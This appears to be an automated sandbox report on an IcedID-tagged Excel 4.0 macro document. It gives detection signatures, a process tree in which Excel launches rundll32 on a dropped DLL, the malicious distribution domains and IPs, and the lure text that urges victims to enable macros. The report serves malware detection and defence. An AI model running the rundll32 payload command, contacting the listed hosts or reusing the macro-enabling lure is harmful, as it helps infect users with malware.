Loading ...

Play interactive tourEdit tour

Analysis Report statistic-2067311372.xlsm

Overview

General Information

Sample Name:statistic-2067311372.xlsm
Analysis ID:403886
MD5:894169c41e45975fa36c36c031628f52
SHA1:3ad2f1b52fca973252dfba03610bf1def0c37e3c
SHA256:69a97d83771cb6cb1583fbf95e5fb9ada26f1ee6257351ecf24b9b4e9e4d80d4
Tags:IcedIDxlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: System File Execution Location Anomaly
Yara detected MalDoc1
Excel documents contains an embedded macro which executes code when the document is opened
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2108 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2708 cmdline: rundll32 ..\jordji.nbvt1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2636 cmdline: rundll32 ..\jordji.nbvt11,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
sharedStrings.xmlJoeSecurity_MalDoc_1Yara detected MalDoc_1Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2108, ProcessCommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, ProcessId: 2708
    Sigma detected: System File Execution Location AnomalyShow sources
    Source: Process startedAuthor: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community: Data: Command: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2108, ProcessCommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, ProcessId: 2708

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: statistic-2067311372.xlsmMetadefender: Detection: 18%Perma Link
    Source: statistic-2067311372.xlsmReversingLabs: Detection: 55%
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: unknownHTTPS traffic detected: 192.254.233.89:443 -> 192.168.2.22:49165 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 192.185.5.2:443 -> 192.168.2.22:49168 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
    Source: global trafficDNS query: name: industrialarttextile.com
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.254.233.89:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.254.233.89:443

    Networking:

    barindex
    Yara detected MalDoc1Show sources
    Source: Yara matchFile source: sharedStrings.xml, type: SAMPLE
    Source: Joe Sandbox ViewIP Address: 192.185.5.2 192.185.5.2
    Source: Joe Sandbox ViewIP Address: 192.254.233.89 192.254.233.89
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48501294.pngJump to behavior
    Source: rundll32.exe, 00000003.00000002.2116228915.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110094202.0000000001C20000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: unknownDNS traffic detected: queries for: industrialarttextile.com
    Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
    Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: jordji.nbvt11.0.drString found in binary or memory: http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4
    Source: rundll32.exe, 00000003.00000002.2116228915.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110094202.0000000001C20000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
    Source: rundll32.exe, 00000003.00000002.2116228915.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110094202.0000000001C20000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
    Source: rundll32.exe, 00000003.00000002.2116520236.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110282418.0000000001E07000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: rundll32.exe, 00000003.00000002.2116520236.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110282418.0000000001E07000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: rundll32.exe, 00000003.00000002.2116520236.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110282418.0000000001E07000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: rundll32.exe, 00000003.00000002.2116520236.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110282418.0000000001E07000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: rundll32.exe, 00000003.00000002.2116228915.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110094202.0000000001C20000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: rundll32.exe, 00000003.00000002.2116520236.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110282418.0000000001E07000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: rundll32.exe, 00000003.00000002.2116228915.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110094202.0000000001C20000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: rundll32.exe, 00000004.00000002.2110094202.0000000001C20000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
    Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
    Source: unknownHTTPS traffic detected: 192.254.233.89:443 -> 192.168.2.22:49165 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 192.185.5.2:443 -> 192.168.2.22:49168 version: TLS 1.2

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
    Source: Screenshot number: 4Screenshot OCR: Enable Content from the yellow bar above P,,mM1 i 92 j| , RunDLL |~| WHY I CANNOTOPEN THIS DO ,0
    Source: Screenshot number: 8Screenshot OCR: Enable Editing , please click Enable Content i from the yellow bar above WHY I CANNOTOPEN THIS DOC
    Source: Screenshot number: 8Screenshot OCR: Enable Content i from the yellow bar above WHY I CANNOTOPEN THIS DOCUMENT? 1 W You are usingiOS o
    Source: Document image extraction number: 7Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
    Source: Document image extraction number: 7Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
    Source: Document image extraction number: 17Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
    Source: Document image extraction number: 17Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? W You are using IDS or And
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: statistic-2067311372.xlsmInitial sample: EXEC
    Source: statistic-2067311372.xlsmInitial sample: CALL
    Found abnormal large hidden Excel 4.0 Macro sheetShow sources
    Source: statistic-2067311372.xlsmInitial sample: Sheet size: 22188
    Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><fileVersion appName="xl" lastEdited="5" lowestEdited="6" rupBuild="9303"/><workbookPr filterPrivacy="1"/><bookViews><workbookView xWindow="8595" yWindow="0" windowWidth="4020" windowHeight="3120"/></bookViews><sheets><sheet name="Sheet1" sheetId="9" r:id="rId1"/><sheet name="Sheet2" sheetId="4" r:id="rId2"/><sheet name="Sheet3" sheetId="7" r:id="rId3"/><sheet name="Sheet4" sheetId="8" r:id="rId4"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Sheet2!$AO$115</definedName></definedNames><calcPr calcId="145621"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext></extLst></workbook>
    Source: rundll32.exe, 00000003.00000002.2116228915.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110094202.0000000001C20000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
    Source: classification engineClassification label: mal84.troj.expl.evad.winXLSM@5/18@2/2
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$statistic-2067311372.xlsmJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD5C5.tmpJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\jordji.nbvt1,DllRegisterServer
    Source: statistic-2067311372.xlsmMetadefender: Detection: 18%
    Source: statistic-2067311372.xlsmReversingLabs: Detection: 55%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\jordji.nbvt1,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\jordji.nbvt11,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\jordji.nbvt1,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\jordji.nbvt11,DllRegisterServer
    Source: C:\Windows\System32\rundll32.exeAutomated click: OK
    Source: C:\Windows\System32\rundll32.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: statistic-2067311372.xlsmInitial sample: OLE zip file path = xl/media/image4.png
    Source: statistic-2067311372.xlsmInitial sample: OLE zip file path = xl/media/image2.png
    Source: statistic-2067311372.xlsmInitial sample: OLE zip file path = xl/media/image1.png
    Source: statistic-2067311372.xlsmInitial sample: OLE zip file path = xl/media/image3.png
    Source: statistic-2067311372.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: statistic-2067311372.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer1SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    statistic-2067311372.xlsm6%VirustotalBrowse
    statistic-2067311372.xlsm21%MetadefenderBrowse
    statistic-2067311372.xlsm55%ReversingLabsWin32.Trojan.Ditertag

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    anaheimdermatologists.com3%VirustotalBrowse
    industrialarttextile.com0%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    anaheimdermatologists.com
    192.185.5.2
    truefalseunknown
    industrialarttextile.com
    192.254.233.89
    truefalseunknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2116520236.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110282418.0000000001E07000.00000002.00000001.sdmpfalse
      high
      http://www.windows.com/pctv.rundll32.exe, 00000004.00000002.2110094202.0000000001C20000.00000002.00000001.sdmpfalse
        high
        http://investor.msn.comrundll32.exe, 00000003.00000002.2116228915.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110094202.0000000001C20000.00000002.00000001.sdmpfalse
          high
          http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2116228915.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110094202.0000000001C20000.00000002.00000001.sdmpfalse
            high
            http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2116520236.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110282418.0000000001E07000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2116520236.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110282418.0000000001E07000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2116228915.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110094202.0000000001C20000.00000002.00000001.sdmpfalse
              high
              http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4jordji.nbvt11.0.drfalse
                high
                http://investor.msn.com/rundll32.exe, 00000003.00000002.2116228915.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110094202.0000000001C20000.00000002.00000001.sdmpfalse
                  high

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  192.185.5.2
                  anaheimdermatologists.comUnited States
                  46606UNIFIEDLAYER-AS-1USfalse
                  192.254.233.89
                  industrialarttextile.comUnited States
                  46606UNIFIEDLAYER-AS-1USfalse

                  General Information

                  Joe Sandbox Version:32.0.0 Black Diamond
                  Analysis ID:403886
                  Start date:04.05.2021
                  Start time:13:48:41
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 6m 15s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:statistic-2067311372.xlsm
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:7
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal84.troj.expl.evad.winXLSM@5/18@2/2
                  EGA Information:Failed
                  HDC Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .xlsm
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Found warning dialog
                  • Click Ok
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  Warnings:
                  Show All
                  • Excluded IPs from analysis (whitelisted): 192.35.177.64, 205.185.216.10, 205.185.216.42, 93.184.221.240
                  • Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, cs11.wpc.v0cdn.net, apps.digsigtrust.com, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu.wpc.apr-52dd2.edgecastdns.net, apps.identrust.com, au-bg-shim.trafficmanager.net, wu.azureedge.net
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.

                  Simulations

                  Behavior and APIs

                  No simulations

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  192.185.5.2statistic-2070252624.xlsmGet hashmaliciousBrowse
                    statistic-2069354685.xlsmGet hashmaliciousBrowse
                      statistic-2070252624.xlsmGet hashmaliciousBrowse
                        statistic-2072807337.xlsmGet hashmaliciousBrowse
                          statistic-207394368.xlsmGet hashmaliciousBrowse
                            statistic-2072807337.xlsmGet hashmaliciousBrowse
                              statistic-207394368.xlsmGet hashmaliciousBrowse
                                catalog-1521295750.xlsmGet hashmaliciousBrowse
                                  catalog-1521295750.xlsmGet hashmaliciousBrowse
                                    statistic-1048881972.xlsmGet hashmaliciousBrowse
                                      statistic-1048881972.xlsmGet hashmaliciousBrowse
                                        f.xlsmGet hashmaliciousBrowse
                                          f.xlsmGet hashmaliciousBrowse
                                            statistic-118970052.xlsmGet hashmaliciousBrowse
                                              statistic-118970052.xlsmGet hashmaliciousBrowse
                                                14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                  14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                    diagram-1732659868.xlsmGet hashmaliciousBrowse
                                                      diagram-1732659868.xlsmGet hashmaliciousBrowse
                                                        diagram-1732659868.xlsmGet hashmaliciousBrowse
                                                          192.254.233.89statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                            statistic-2069354685.xlsmGet hashmaliciousBrowse
                                                              statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                  statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                    statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                      statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                        statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                          statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                            statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                              statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                  14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    industrialarttextile.comstatistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                    • 192.254.233.89
                                                                                    statistic-2069354685.xlsmGet hashmaliciousBrowse
                                                                                    • 192.254.233.89
                                                                                    statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                    • 192.254.233.89
                                                                                    statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                    • 192.254.233.89
                                                                                    statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                    • 192.254.233.89
                                                                                    statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                    • 192.254.233.89
                                                                                    statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                    • 192.254.233.89
                                                                                    statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                                    • 192.254.233.89
                                                                                    statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                                    • 192.254.233.89
                                                                                    statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                    • 192.254.233.89
                                                                                    statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                    • 192.254.233.89
                                                                                    14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                    • 192.254.233.89
                                                                                    14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                    • 192.254.233.89
                                                                                    anaheimdermatologists.comstatistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    statistic-2069354685.xlsmGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
